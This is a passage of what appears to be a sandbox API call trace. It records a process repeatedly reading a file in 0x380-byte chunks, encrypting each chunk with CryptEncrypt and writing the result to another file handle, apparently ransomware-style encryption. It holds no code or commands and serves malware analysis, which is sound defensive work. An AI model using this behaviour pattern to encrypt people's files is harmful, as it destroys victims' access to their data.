lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.630] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.630] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.630] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.630] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.631] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.631] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.631] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.631] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.631] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.631] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.631] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.631] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.631] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.631] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.631] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.632] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.632] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.632] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.632] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.632] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.633] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.633] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.633] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.633] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.633] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.633] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.633] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.634] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.634] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.634] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.634] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.634] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.634] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.634] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.634] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.634] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.634] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.635] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.635] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.635] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.635] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.635] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.635] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.635] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.635] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.635] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.635] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.636] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.636] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.636] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 